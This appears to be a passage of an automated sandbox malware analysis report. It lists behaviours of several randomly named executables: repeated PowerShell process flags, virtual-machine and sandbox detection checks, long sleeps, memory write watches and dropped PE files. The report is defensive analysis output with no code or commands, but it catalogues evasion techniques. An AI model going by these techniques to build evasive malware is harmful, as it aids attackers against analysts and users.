Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	System information queried: FirmwareTableInformation

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Windows\System32\svchost.exe

Section loaded: OutputDebugStringW count: 128

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PZ3hKWPffUrXuh6Gjn77Ivv1.exe, 00000008.00000002.1742610833.000000000300E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Memory allocated: 233C0730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 6480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 7480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 7920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 8920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 8BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 78E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: A210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: B210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: C210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 78E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 6480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 9210000 memory reserve \| memory write watch	Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\svchost.exe	File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599336	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598789	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596757	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596529	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595118	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595013	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594787	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593885	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Thread delayed: delay time: 300000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4850	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5010	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 3982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 5750	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 423

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\360TS_Setup.exe (copy)	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exe	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\360TS_Setup.exe.P2P	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup294[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\o2i3jroi23joj23ikrjokij3oroi[1].exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ED0F.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exe	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Dropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exe	Jump to dropped file
